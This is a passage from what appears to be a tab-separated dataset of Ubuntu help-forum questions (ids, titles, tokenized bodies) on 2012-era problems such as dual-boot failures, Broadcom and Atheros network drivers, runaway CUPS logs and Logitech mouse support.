236926	how do i prioritize internet traffic in my local network for individual pcs ?	got three pcs ( two linux , one windows ) on my wireless home network . is there any way to 'prioritise ' internet usage/traffic for these machines e.g . make pc 1 always have higher priority on internet usage than pc # 3 ?
236927	will microsoft touch mouse work ?	i would like to buy microsoft touch mouse but i do n't know if it 's going to work . i am interested especially on the multitouch functions ( gestures ) and touch scrolling . have anyone tested it on ubuntu ?
236931	backlight goes off during ubuntu installation	during 32-bit ubuntu 12.04 lts installation on hp laptops , the back-light goes off and become unable to proceed . i 've experienced it on many hp laptops . do anyone provide the reason or a solution for the problem .
236936	timezone in `` date & time '' from gnome control center is frequently wrong	currently on a system with ubuntu and awesome as the window manager . for some reason changing the timezone in gnome control center does not do a thing . running date returns the right timezone ( as this was modified by appending tz='america/los_angeles ' ; export tz in .bashrc ) , but as the clock widget runs by gnome control center 's watch , my clock is always set on the wrong ( previous ) time zone . i have ntp installed and the time is correct , it 's simply that the timezones are not being changed properly .
236938	i ca n't boot into ubuntu after installation from cd !	yesterday i created an ubuntu installation cd . installation process went well , i created some new partitions , waited through the whole installation process and within 30 minutes it was finished . then it asked me to remove my cd and press enter , which i did . then it re-booted into windows 7 ( my main os ) , but i wanted to boot into ubuntu instead . it did n't show any boot up screen or anything else for os selection . i 've tried looking up some tutorials i even tried alt + f12 but that did n't help either . my specs are : 1tb hard drive 8 gb ram intel 5 nvidia gtx 560 i wanted to dual boot for a while and i really want this problem fixed , i 'm currently on the `` try ubuntu '' and that works all well etc . thanks already , nick .
236946	can i use ubuntu 12.04 on a laptop with 768mb ram and a pentium m processor ?	my laptop has 768mb ram and a pentium-m 2.00 ghz processor . can i use ubuntu 12.04 on my laptop ? will it slow down ?
236947	unable to copy files to usb drive	it says `` error creating directory : no space left on device '' when the truth is my usb has nothing inside it and i tried it with others ... same result . i have a 12.04 version of ubuntu .
236948	how to download ubuntu one app on samsung note ii ?	i am not able to download ubuntu one app on samsung note ii - neither via app store nor via bar code . could the app be made to appear on the screen of the device ?
236949	name of newly created user missing features in ubuntu 12.10	hi i am not very experienced with user management in ubuntu . i needed to create a new user to manage my application server so following some instructions online , this is what i did : i became root sudo -i i added a group addgroup jbossgroup i added a user and assigned it to a group useradd -g jbossgroup jboss i created a password passwd jboss then i changed the ownership of a folder to check that the user was correctly created and that working fine . chown jboss : jbossgroup /opt/jboss-as-7.1.1.final/ -r i made this user sudoer gpasswd -a jboss sudo but i think this is not working since when i use mkdir or rm ... in a folder owned by root , i have to type sudo . ( did i do this step correctly ? ) the next thing i noticed was that when i changed to the newly created user , the terminal only displayed this : $ so i fixed that by doing this as the jboss user : chsh -s /bin/bash i have some doubts did i correctly create this user and is it safe to work with it ? why the name of the user does n't appear in the drop down menu when i click the shutdown button ( next to the time in the top right corner of the screen ) ? also i noticed that in the home folder there is not a jboss folder . why this was not created ? what other features this user might be missing ?
236952	is there a performance difference between running .net applications via mono and running them via the .net framework on wine ?	i 've been using wine coupled with .net for ages to run .net applications , but i recently found out about mono , a cross-platform , open source version of the .net framework . i was wondering : since mono is native and wine is a sort of `` emulator '' , does that mean that mono will be faster and/or better at running .net applications ?
236955	computer refuses to boot	friends computer refuses to boot . have tried live cd and trying to mount the 79gb file system and get the following message . 'unable to mount 79gb file system error mounting : mount : wrong fs type , bad option , bad superblock on/dev/sda1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so
236956	hotmail inbox deleted after setting up evolution	i recently set up my hotmail account on evolution . i have been using thunderbird but just to see how is evolution i did so . but now when i log in to http : //hotmail.com , all my emails in my inbox have disappeared/deleted . but i could see all those emails in evolution and thunderbird . how do i get those emails back to hotmail website . i suppose some settings are messed up in evolution ?
236961	unable to install php5 on 12.10	i am trying to install php5 on ubuntu 12.10 desktop and getting the following error : sudo apt-get install php5 php5-cli libapache2-mod-php5 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . libapache2-mod-php5 : depends : libdb4.8 but it is not installable php5-cli : depends : libdb4.8 but it is not installable e : unable to correct problems , you have held broken packages . how can i recover from this ? sources.list : # deb cdrom : [ ubuntu 12.10 _quantal quetzal_ - release i386 ( 20121017.2 ) ] / quantal main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //gb.archive.ubuntu.com/ubuntu/ quantal main restricted deb-src http : //gb.archive.ubuntu.com/ubuntu/ quantal main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //gb.archive.ubuntu.com/ubuntu/ quantal-updates main restricted deb-src http : //gb.archive.ubuntu.com/ubuntu/ quantal-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //gb.archive.ubuntu.com/ubuntu/ quantal universe deb-src http : //gb.archive.ubuntu.com/ubuntu/ quantal universe deb http : //gb.archive.ubuntu.com/ubuntu/ quantal-updates universe deb-src http : //gb.archive.ubuntu.com/ubuntu/ quantal-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //gb.archive.ubuntu.com/ubuntu/ quantal multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ quantal multiverse deb http : //gb.archive.ubuntu.com/ubuntu/ quantal-updates multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ quantal-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //gb.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu quantal-security main restricted deb-src http : //security.ubuntu.com/ubuntu quantal-security main restricted deb http : //security.ubuntu.com/ubuntu quantal-security universe deb-src http : //security.ubuntu.com/ubuntu quantal-security universe deb http : //security.ubuntu.com/ubuntu quantal-security multiverse deb-src http : //security.ubuntu.com/ubuntu quantal-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu quantal partner # deb-src http : //archive.canonical.com/ubuntu quantal partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu quantal main deb-src http : //extras.ubuntu.com/ubuntu quantal main
236962	cloning a repository ?	i need to clone a repository . the command is : git clone https : //github.com/androportal/linux-sunxi.git if i do it this way it takes a long time to install/download . now i opened this link and i got a zip file of the same linux-sunxi . how do i install this zip file ? i mean what is difference between cloning and a zip file ?
236970	bluetooth and wifi get switched on and off together	i 'm running ubuntu 12.04 with gnome on a dell inspiron 1470 , my wlan card is a broadcom bcm4312 . was previously using windows 7 . now at startup both bt and wifi are switched on . if i switch off bluetooth , wifi automatically does so . when i try the fn command , f2 in this case , both adaptors switch either on or off . is there a way to get them to work independently once again ?
236974	how to insert the interpunct character in ubuntu ?	does anyone know how i can insert the interpunct character ( also known as midline decimal http : //en.wikipedia.org/wiki/interpunct ) in ubuntu . the combination mentioned in the wikipedia article does not seem to work : alt gr + .
236975	vlc is lagging when playing hd videos over my home network	i am well aware that this question has been asked about a billion times all over the internet but so far nothing has worked for me ... i have a home server ( ubuntu server 12.04 ) and a laptop ( ubuntu desktop 12.04 ) connected to the same local network ( both wired to my router ) . what i am trying to do is to access my server from my laptop ( ssh ) to play hd movies ( located on the server ) directly on my laptop ( using vlc ) . it works just fine with 720p format movies , but as soon as i try with 1080p movies , it starts to lag badly . i have tried all the usual tricks : increasing the caching value setting the option `` skip the loop filter for h.264 decoding '' to `` all '' change the `` video output module '' value none of them worked for me . by increasing the caching value though , it actually seemed to work because it `` buffers '' for a while before starting the video , but after a while the movie stops and starts to `` buffer '' again ... note : if the movie is located on my laptop , it works good . same issue with other players ( totem , mplayer etc ... ) this issue has been killing me for a while now , anybody knows how to solve this ? thank you very much in advance . chris information about my laptop : hp pavilion dv6 processor : 2.2 ghz intel core i7-2670q memory : ram 6 gb ddr3 video : amd radeon hd 6490m ( 1 gb ddr5 dedicated , up to 4 gb total )
236976	can i use an ubuntu live usb/cd without damaging my windows 8 pc ?	i have a windows 8 laptop with intel i3 and 750gb hard drive . i do n't want to install ubuntu instead of windows and have heard horror stories about only being able to have one system on the hard drive because microsoft have prevented partitioning or something like that . can i run ubuntu from a live usb stick or external hard drive without damaging windows ? thanks
236977	unmounting and mounting drives	i have a passport device that i plugged in using firewire that i use to house old , unused files so that my mac computer would process more freely . after i connect it the drive is read , i then move files over with no problem . so that works done ! because i dont see where i can force a password when opening the passport device ( and i have some important files on it ) i decided to unmount it . once i unmount it i no longer see the drive . to see the drive again , do i have to unplug the firewire and replug it in or is there another way without me having to do that tedious task again and again ?
236982	how to run a particular command at startup ?	i do n't understand scripts or how to make them or how to run them . all i want to do is run the command xmodmap -e `` keycode 112 = delete '' when my computer starts . when i run this command in terminal , it remaps the pgdn key to be a second delete key . but then i have to run it again every time i start the computer . how can i do this ? i 've tried adding it as a line in the rc.local file but it does n't work .
236983	where can i find ubuntu .img file to use on android ?	i am looking for a ubuntu .img file that i can copy to an sd card and use in android key . .iso files , i can find easily , but not .img files .
236987	how to install 32-bit ubuntu server alongside 32-bit ubuntu 12.04	i need to avoid the graphical user interface of ubuntu 12.04 . kindly advise if this can be achieved by installation of the ubuntu-12.10-server along side the existing installation of ubuntu 12.04 on my desk top . i would be most grateful for your kind help .
236993	using visual studio for ubuntu ?	i would like to make programs in c++ for ubuntu and windows . i will be using visual studio on a windows pc for the programming . i know how to make the install files for windows . i just need to know how to make the files linux uses for programs in visual studio ? if you do n't know visual studio could some one tell be the extensions used on install files or runnable executable ( for linux ) .
236998	12.10 freezeing . nothing works except the power button	i am having the same problem ubuntu 12.10 32bit on a hp g72 laptop . when it freezes you ca n't do anything . the key board , the mouse , the screen are completely frozen and you can only push the power button to get it to re-start ( reboot ) . i have tried all the keyboard things ( like alt-sysreg r e i s u b ) and nothing works because the keyboard is frozen . i do n't know what to do . my windows 7 install ( on same laptop ) does not freeze . i do n't have any pattern of the freeze . it just happens . then you have no choice but to push the power button . does anyone have any idea 's ? i had 12.04 on this same laptop , and it never froze either . are their any log messages that may help me isolate the cause ?
237004	atheros ar8161 ethernet card not working on 12.10 on an asus n56vm	i have installed ubuntu 12.10 ( 64bits ) ( 3.5.0-18 kernel ) on an asus n56vm and the ethernet card is n't working . wireless card works okay . the card is atheros communications inc. ar8161 gigabit ethernet [ 1969:1091 ] ( rev 10 ) . i have read that there 's a workaround for 12.04 but not for 12.10 . additional info : $ lspci -nnk | grep -i ethernet 04:00.0 ethernet controller [ 0200 ] : atheros communications inc. ar8161 gigabit ethernet [ 1969:1091 ] ( rev 10 ) $ ifconfig eth0 eth0 : error fetching interface information : device not found $ ifconfig -a lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1138 errors:0 dropped:0 overruns:0 frame:0 tx packets:1138 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:115837 ( 115.8 kb ) tx bytes:115837 ( 115.8 kb ) wlan0 link encap : ethernet hwaddr e0 : b9 : a5 : f9 : ba:02 inet addr:192.168.0.102 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :e2b9 : a5ff : fef9 : ba02/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:8911 errors:0 dropped:0 overruns:0 frame:0 tx packets:7175 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:7837367 ( 7.8 mb ) tx bytes:1063488 ( 1.0 mb )
237005	how to disable console-kit-daemon in xubuntu 12.10 ?	i just want to know how to disable console-kit-daemon in xubuntu 12.10 . background in the last months i tried ubuntu and i faced a memory error related to console-kit-daemon that spawned too much threads and was eating some 500mb of memory ... i had switched to xubuntu distro , to test if desktop environment was the problem , but no . lately , i got the same problem in xubuntu 12.10 . now i want to try disabling this service to see if it can fix the memory related problem .
237011	wireless internet not working : unclaimed	wireless internet on my acer travelmate 5310 with broadcom bcm5787m gigabit ethernet does n't seem to be working . i am a newby to ubuntu/linux but tried the following : lspci : 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation n10/ich 7 family pci express port 2 ( rev 02 ) 00:1c.2 pci bridge : intel corporation n10/ich 7 family pci express port 3 ( rev 02 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 02 ) 00:1f.2 sata controller : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ahci mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 02 ) 02:00.0 ethernet controller : broadcom corporation netlink bcm5787m gigabit ethernet pci express ( rev 02 ) 03:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) 0a:06.0 cardbus bridge : texas instruments pcixx12 cardbus controller 0a:06.1 firewire ( ieee 1394 ) : texas instruments pcixx12 ohci compliant ieee 1394 host controller 0a:06.2 mass storage controller : texas instruments 5-in-1 multimedia card reader ( sd/mmc/ms/ms pro/xd ) 0a:06.3 sd host controller : texas instruments pcixx12 sda standard compliant sd host controller lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub *-network description : ethernet interface product : netlink bcm5787m gigabit ethernet pci express vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 02 serial : 00:16 : d3:5d:58:3b size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.121 duplex=full firmware=5787m-v3.23 ip=10.0.1.17 latency=0 link=yes multicast=yes port=twisted pair speed=1gbit/s resources : irq:45 memory : d6000000-d600ffff *-network unclaimed description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : d8000000-d8003fff sudo rfkill list 0 : acer-wireless : wireless lan soft blocked : no hard blocked : no apparently the network is unclaimed . could anyone help me out on this one ?
237015	dungeondefenders does not start on ubuntu 12.10 64bit	i 'm using ubuntu 12.10 64bit with gnome3 and the fglrx-updates graphics drivers . the drivers work good , i.e . with grimrock ( wine ) , oilrush or rochard . now , i bought the humbleindiebundle7 and want to play dungeondefenders . i extracted the archive and found a ./dungeondefenders script in this folder . when i start this script , the spash screen of the game appears , lasts some seconds and disappears again . then the program has ended . via terminal i can see the following output : chocobai @ pfubuntu : ~/arbeitsfläche/dungeondefenders $ ./dungeondefenders dungeon defenders : installed in '/home/chocobai/arbeitsfläche/dungeondefenders ' . *** glibc detected *** ./dungeondefenders-x86 : free ( ) : invalid pointer : 0x0a9e9118 *** ======= backtrace : ========= /lib/i386-linux-gnu/libc.so.6 ( +0x75ee2 ) [ 0xf7224ee2 ] /home/chocobai/arbeitsfläche/dungeondefenders/udkgame/binaries/libsdl2-2.0.so.0 ( +0xb8072 ) [ 0xf7590072 ] /home/chocobai/arbeitsfläche/dungeondefenders/udkgame/binaries/libsdl2-2.0.so.0 ( sdl_videoquit+0x6e ) [ 0xf756f2de ] /home/chocobai/arbeitsfläche/dungeondefenders/udkgame/binaries/libsdl2-2.0.so.0 ( sdl_quitsubsystem+0x16d ) [ 0xf74e1f3d ] /home/chocobai/arbeitsfläche/dungeondefenders/udkgame/binaries/libsdl2-2.0.so.0 ( sdl_quit+0x28 ) [ 0xf74e2018 ] ./dungeondefenders-x86 [ 0x9aff07b ] /lib/i386-linux-gnu/libc.so.6 ( +0x32f51 ) [ 0xf71e1f51 ] ======= memory map : ======== 08048000-0a4b5000 r-xp 00000000 08:03 37486660 /home/chocobai/arbeitsfläche/dungeondefenders/udkgame/binaries/dungeondefenders-x86 0a4b5000-0a4b6000 r-xp 0246c000 08:03 37486660 /home/chocobai/arbeitsfläche/dungeondefenders/udkgame/binaries/dungeondefenders-x86 0a4b6000-0a502000 rwxp 0246d000 08:03 37486660 /home/chocobai/arbeitsfläche/dungeondefenders/udkgame/binaries/dungeondefenders-x86 0a502000-0a5e2000 rwxp 00000000 00:00 0 0a9be000-0ba5b000 rwxp 00000000 00:00 0 [ heap ] f0b56000-f0d56000 rwxs ef586000 00:05 9778 /dev/ati/card0 f1100000-f11b2000 rwxp 00000000 00:00 0 f11b2000-f1200000 -- -p 00000000 00:00 0 f1300000-f13ab000 rwxp 00000000 00:00 0 f13ab000-f1400000 -- -p 00000000 00:00 0 f14c1000-f14c2000 -- -p 00000000 00:00 0 f14c2000-f1cc2000 rwxp 00000000 00:00 0 f1cc2000-f1cc3000 -- -p 00000000 00:00 0 f1cc3000-f24c3000 rwxp 00000000 00:00 0 f2600000-f2621000 rwxp 00000000 00:00 0 f2621000-f2700000 -- -p 00000000 00:00 0 f27ff000-f2800000 -- -p 00000000 00:00 0 f2800000-f3000000 rwxp 00000000 00:00 0 [ stack:20940 ] f3000000-f3021000 rwxp 00000000 00:00 0 f3021000-f3100000 -- -p 00000000 00:00 0 f3129000-f3169000 rwxs 00027000 00:05 9778 /dev/ati/card0 f3169000-f316a000 -- -p 00000000 00:00 0 f316a000-f396a000 rwxp 00000000 00:00 0 [ stack:20936 ] f396a000-f396b000 -- -p 00000000 00:00 0 f396b000-f416b000 rwxp 00000000 00:00 0 [ stack:20935 ] f419f000-f41a0000 rwxp 00000000 00:00 0 f41a0000-f41a7000 r-xs 00000000 08:01 1312550 /usr/lib/i386-linux-gnu/gconv/gconv-modules.cache f41a7000-f48a7000 rwxs 00006000 00:05 9778 /dev/ati/card0 f48a7000-f4b27000 rwxp 00000000 00:00 0 f4b27000-f4b75000 r-xp 00000000 08:01 417564 /usr/lib32/fglrx/libatiadlxx.so f4b75000-f4b77000 rwxp 0004e000 08:01 417564 /usr/lib32/fglrx/libatiadlxx.so f4b77000-f4b87000 rwxp 00000000 00:00 0 f4bac000-f6dbb000 r-xp 00000000 08:01 417567 /usr/lib32/fglrx/dri/fglrx_dri.so f6dbb000-f6ed0000 rwxp 0220e000 08:01 417567 /usr/lib32/fglrx/dri/fglrx_dri.so f6ed0000-f6f9b000 rwxp 00000000 00:00 0 f6f9b000-f6f9f000 r-xp 00000000 08:01 1313273 /usr/lib/i386-linux-gnu/libxxf86vm.so.1.0.0 f6f9f000-f6fa0000 r-xp 00003000 08:01 1313273 /usr/lib/i386-linux-gnu/libxxf86vm.so.1.0.0 f6fa0000-f6fa1000 rwxp 00004000 08:01 1313273 /usr/lib/i386-linux-gnu/libxxf86vm.so.1.0.0 f6fa1000-f6fa3000 r-xp 00000000 08:01 1313796 /usr/lib/i386-linux-gnu/libxss.so.1.0.0 f6fa3000-f6fa4000 r-xp 00001000 08:01 1313796 /usr/lib/i386-linux-gnu/libxss.so.1.0.0 f6fa4000-f6fa5000 rwxp 00002000 08:01 1313796 /usr/lib/i386-linux-gnu/libxss.so.1.0.0 f6fa5000-f6fae000 r-xp 00000000 08:01 1313187 /usr/lib/i386-linux-gnu/libxrandr.so.2.2.0 f6fae000-f6faf000 r-xp 00008000 08:01 1313187 /usr/lib/i386-linux-gnu/libxrandr.so.2.2.0 f6faf000-f6fb0000 rwxp 00009000 08:01 1313187 /usr/lib/i386-linux-gnu/libxrandr.so.2.2.0 f6fb0000-f6fb2000 r-xp 00000000 08:01 1313185 /usr/lib/i386-linux-gnu/libxinerama.so.1.0.0 f6fb2000-f6fb3000 r-xp 00001000 08:01 1313185 /usr/lib/i386-linux-gnu/libxinerama.so.1.0.0 f6fb3000-f6fb4000 rwxp 00002000 08:01 1313185 /usr/lib/i386-linux-gnu/libxinerama.so.1.0.0 f6fb4000-f6fb9000 r-xp 00000000 08:01 1312921 /usr/lib/i386-linux-gnu/libxfixes.so.3.1.0 f6fb9000-f6fba000 r-xp 00004000 08:01 1312921 /usr/lib/i386-linux-gnu/libxfixes.so.3.1.0 f6fba000-f6fbb000 rwxp 00005000 08:01 1312921 /usr/lib/i386-linux-gnu/libxfixes.so.3.1.0 f6fbb000-f6fc3000 r-xp 00000000 08:01 1312775 /usr/lib/i386-linux-gnu/libxrender.so.1.3.0 f6fc3000-f6fc4000 r-xp 00007000 08:01 1312775 /usr/lib/i386-linux-gnu/libxrender.so.1.3.0 f6fc4000-f6fc5000 rwxp 00008000 08:01 1312775 /usr/lib/i386-linux-gnu/libxrender.so.1.3.0 f6fc5000-f6fce000 r-xp 00000000 08:01 1313181 /usr/lib/i386-linux-gnu/libxcursor.so.1.0.2 f6fce000-f6fcf000 r-xp 00008000 08:01 1313181 /usr/lib/i386-linux-gnu/libxcursor.so.1.0.2 f6fcf000-f6fd0000 rwxp 00009000 08:01 1313181 /usr/lib/i386-linux-gnu/libxcursor.so.1.0.2 f6fd0000-f7014000 rwxp 00000000 00:00 0 f7014000-f7019000 r-xp 00000000 08:01 1312733 /usr/lib/i386-linux-gnu/libxdmcp.so.6.0.0 f7019000-f701a000 r-xp 00004000 08:01 1312733 /usr/lib/i386-linux-gnu/libxdmcp.so.6.0.0 f701a000-f701b000 rwxp 00005000 08:01 1312733 /usr/lib/i386-linux-gnu/libxdmcp.so.6.0.0 f701b000-f701d000 r-xp 00000000 08:01 1312731 /usr/lib/i386-linux-gnu/libxau.so.6.0.0 f701d000-f701e000 r-xp 00001000 08:01 1312731 /usr/lib/i386-linux-gnu/libxau.so.6.0.0 f701e000-f701f000 rwxp 00002000 08:01 1312731 /usr/lib/i386-linux-gnu/libxau.so.6.0.0 f701f000-f703f000 r-xp 00000000 08:01 1312735 /usr/lib/i386-linux-gnu/libxcb.so.1.1.0 f703f000-f7040000 r-xp 0001f000 08:01 1312735 /usr/lib/i386-linux-gnu/libxcb.so.1.1.0 f7040000-f7041000 rwxp 00020000 08:01 1312735 /usr/lib/i386-linux-gnu/libxcb.so.1.1.0 f7041000-f7173000 r-xp 00000000 08:01 1312737 /usr/lib/i386-linux-gnu/libx11.so.6.3.0abgebrochen chocobai @ pfubuntu : ~/arbeitsfläche/dungeondefenders $ i can see that the script is executing a binary file in this folder wit x86 in the name . i wonder whether the game is not compatible with 64bit systems ? it looks like it tries to execute binarys for other architectures . is this even a problem i can solve or should i contact the humble support ? or am i doing something wrong ? the scrips looks like this : # ! /bin/sh # this script is for linux ! findpath ( ) { x=`which `` $ 1 '' ` y=`readlink -e `` $ x '' ` dirname `` $ y '' } if [ `` $ { dundef_data_path } '' = `` '' ] ; then dundef_data_path= '' `findpath `` $ 0 '' ` '' fi echo `` dungeon defenders : installed in ' $ dundef_data_path ' . '' cd `` $ dundef_data_path/udkgame/binaries '' exec ./dungeondefenders-x86 `` $ @ '' i ca n't imagine that this game only runs on 32bit and they did not tell the customers about it . thanks for advices . ps : besides the x86 binary there is no alternative in this folder : chocobai @ pfubuntu : ~/arbeitsfläche/dungeondefenders/udkgame/binaries $ ls dungeondefenders-x86 libopenal.so.1 libsdl2-2.0.so.0 xdg-open
237017	whom should i ask to update a package to a new upstream release ?	whom should i ask for upgrading the particular package , if there is a new upstream release ? should i file a bug report ? what if the package is maintained by debian maintainers ? should i leave a comment at their mailing list ?
237018	why screen resolution remains 640x480 when i close a game ?	i played lugaru , the game went in full screen mode , but when i closed the game , the screen resolution was still 640x480 . it happened with neighbours from hell also , using wine , and well ... almost every game i tried in fullscreen mode . is it normal ? is there a fix for that ?
237019	log files ( cups ) grow so fast !	the past few days i faced a strange issue with my computer . i discussed it here : server logs are filling my hard disk , how do i fix this ? shortly , log files ( in cups folder ) grow so fast ! i did solve the problem but i 'm afraid of facing it again . i need to know what cause it so that i can avoid it . i 'm not sure but does the fact that i do n't separate the root and /home relevant ? sudo parted -l disk /dev/sda : 500gb sector size ( logical/physical ) : 512b/512b partition table : gpt number|start|end|size|file system|name|flag 1|17.4k|20.0mb|20.0mb|fat16| |boot 2|20.0mb|489gb|489gb|ext4 3|489gb|500gb|10.6gb|linux-swap ( v1 ) update the problem is back : ( the /var/log/sups is full again ( 444gb ) i did n't do anything ! ls -l /var/log/cups/ total 464543116 -rw-r -- -- - 1 root adm 0 dec 30 07:47 access_log -rw-r -- -- - 1 root adm 587 dec 30 07:37 access_log.1.gz -rw-r -- -- - 1 root adm 259 dec 29 07:59 access_log.2.gz -rw-r -- -- - 1 root adm 258 dec 28 07:41 access_log.3.gz -rw-r -- -- - 1 root adm 255 dec 27 07:23 access_log.4.gz -rw-r -- -- - 1 root adm 252 dec 26 07:04 access_log.5.gz -rw-r -- -- - 1 root adm 230 dec 25 07:44 access_log.6.gz -rw-r -- -- - 1 root adm 161 dec 24 12:18 access_log.7.gz -rw-r -- -- - 1 root adm 475691855862 jan 7 07:50 error_log -rw-r -- -- - 1 root adm 245 dec 29 14:34 error_log.1.gz -rw-r -- -- - 1 root adm 0 feb 29 29 2012 page_log cat /etc/logrotate.d/cups /var/log/cups/*log { daily missingok rotate 7 sharedscripts postrotate if [ -e /var/run/cups/cupsd.pid ] ; then invoke-rc.d -- quiet cups force-reload > /dev/null sleep 10 fi endscript compress notifempty create 640 root lpadmin } when i stop cups and remove the file by : sudo service cups stop sudo rm /var/log/cups/error_log sudo service cups start the problem gone but i 'm afraid it will be back again
237020	will reinstalling ubuntu wipe /var/www ?	i have a testing server set up in /var/www , and a mysql database somewhere , and i recently have been having problems where x wo n't load . the only suggestion so far is to reinstall . normally , that would n't be a problem , since i have a different drive mapped to /home , but i 'm scared that reinstalling will wipe /var/www and other directories where i have much-needed config files .
237021	thunderbird does not open when using the indicator menu	running ubuntu 11.10 . the mail application we are using is thunderbird using a pop3 protocol with a couple of email accounts . when an email arrives we get the usual on-screen indication . however , something has changed recently . it used to be that if we went to the messaging indicator menu ( the mail envelope ) we could click the inbox menu item and thunderbird would open ( i.e . become the active application ) . this was completely consistent whether thunderbird had already been opened and was sitting in the background or whether it was unopened . now , if thunderbird is already open but with another application active , then all that happens is the thunderbird icon in the sidebar wiggles . it works perfectly fine if thunderird is closed , as it will open thunderbird and make it the active application . this is really irritating as it would be nice to go back to the old behaviour . we have made no configuration changes and so the only thing i can think of is that a recent patch has altered the setting/behaviour in some way . is there a way of changing the behaviour so that clicking on the indicator menu always opens up thunderbird and makes it the active application ? thanks rob
237024	how to delete unity default launchers	as a part of the system init script , i want to delete default launchers after blank ubuntu desktop installation using bash script . if i delete launchers from the /usr/share/applications it works , but then it deletes them for all users , while i want to delete them only for the active user . after blank install ~/.local/share/applications do n't exist .
237027	how to record screen and internal audio ?	is there a way to record my screen , as well as the internal audio ? like , if i were recording a game , it would record the screen , and the sounds from the game .
237029	logitech wireless m510 does not work 12.10	i ' ve just installed ubuntu 12.10 64 bits on my new laptop and my logitech m510 mouse does not work . it worked perfectly on 11.04 but it stop woth the new version , i 've read here that i need to install hid point , but i 'm having trouble with that too . here 's my output of : lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 004 : id 046d : c52b logitech , inc. unifying receiver bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 1bcf:2885 sunplus innovation technology inc. as you can see it recognizes de unifying receiver , but the mouse does not respond . when i try to install hid point i get this : libpng does not exist libtiff does not exist gathering system information and generating a log launching hidpoint installer ./hidpointsetup : error while loading shared libraries : libpng.so.3 : can not open shared object file : no such file or directory i 've installed the 32-bit libraries just as it says in the installation instructions but nothing works . thank you in advanced ! edit on this thread : logitech m515 does not work after upgrade to 12.04 they suggest this line `` modprobe -r hid_logitech_dj & & modprobe hid_logitech_dj '' should fix the problem but i get this error when i execute it : warning : error inserting usbhid ( 